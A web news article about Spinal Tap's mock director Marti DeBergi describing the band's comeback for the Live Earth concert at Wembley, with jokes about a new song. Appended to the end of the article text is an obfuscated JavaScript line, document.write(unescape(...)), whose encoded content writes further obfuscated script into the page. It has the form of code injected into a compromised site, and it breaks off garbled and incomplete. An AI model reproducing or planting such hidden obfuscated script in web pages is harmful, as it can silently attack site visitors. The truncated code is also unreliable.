Xfm spoke exclusively to Spinal Tap director Marti DeBergi about why they've chosen now to come out of retirement, what to expect from the legendary band's Live Earth performance and their hopes for an awesome comedy collaboration reports XFM.co.uk.
The rock band, who hit our screens in 1984 with the rockumentary 'This Is Spinal Tap', are planning to come out of retirement (for the 26th time) to take to the stage for London's Live Earth concert, alongside Madonna, Red Hot Chilli Peppers and Foo Fighters.
Turning first to why the band (who Reiner revealed have spent the past 20 years breeding miniature race horses, opening colonic clinics and going to rehab for internet addiction) have chosen to come out of retirement for this event.
"I think it was the idea of helping the world," DeBergi explained, 'This was a call to arms to stop the tide of global warming, even though they knew very little about global warming. [guitarist] Nigel Tufnel thought it was just to do with people wearing too many clothes... He just thought if it was too hot, then they should take some clothes off."
And it seems the band are going all out for the event - which is set to take place in Wembley Stadium on July 7 - and even starting penning some new (typically masterful) material, as DeBergi revealed,
"They wrote a new song for the concert called 'Warmer Than Hell'. It basically goes, "The Devil went to Devon, Felt like the fourth degree, He said "Is it hot in here or is it only me?""
As for what we can expect from the band who are renowned for stage theatrics DeBergi confirmed they do indeed have a few tricks (and special guests) up their sleeves,
"I think they're gonna do [classic Tap tracks] 'Stonehenge' and 'Big Bottom' and then we're gonna do the new number 'Warmer Than Hell'. They always have some 'interesting' stage craft, so one way to look at it is a disaster waiting to happen.
"I'm hoping that Ricky Gervais is gonna be there", he continued, 'We're trying to convince him right now, but Marti DeBergi is definitely going to introduce Spinal Tap!"document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
